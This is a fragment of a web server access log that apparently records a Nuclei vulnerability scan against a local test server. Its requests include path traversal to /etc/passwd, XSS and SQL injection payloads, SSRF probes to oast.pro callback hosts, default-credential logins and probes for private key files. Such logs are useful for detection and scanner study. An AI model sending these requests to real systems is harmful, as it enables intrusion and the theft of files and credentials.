WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbconsole/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/console?.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/robomongo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"IWP_JSON_PREFIX","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jkstatus/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /names.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /documentation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example%E3%80%82com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/coverage.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'` HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22params\x22:{\x22token\x22: \x22Test\x22},\x22method\x22:\x22web.LoginSTS\x22}","remote_addr":"192.168.144.1","http_host":"ca28bc0smpvbbtig07h07pdaj4kncpno4.oast.pro","request":"POST /minio/webrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common_page/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /h2-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer/Pages/ReportViewer.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /robomongo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /net/net/net.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/cipher.aes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /documentation/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /key.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/release.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"username=admin&password=geoserver","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /geoserver/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/user/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_dashboards/app/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error3?msg=30&data=';alert('nuclei');// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pme/database/pme/phinx.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"{\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22User.filter\x22,\x22id\x22: 1,\x22params\x22:{\x22query\x22:{\x22is_active\x22:true}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /json-rpc/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/java.lang:type=Memory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssl/localhost.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/pr.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shindig/gadgets/proxy?container=default&url=http://oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/c/d/android.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /omni_success?cmdb_edit_path=\x22);alert('nuclei');// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/attachment/pandora_chat.log.json.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/getagent.cgi?type=s&xxxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /msa/../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libraries/joomla/database/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/java.lang:type=Memory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssl/127.0.0.1.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/automerge.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", 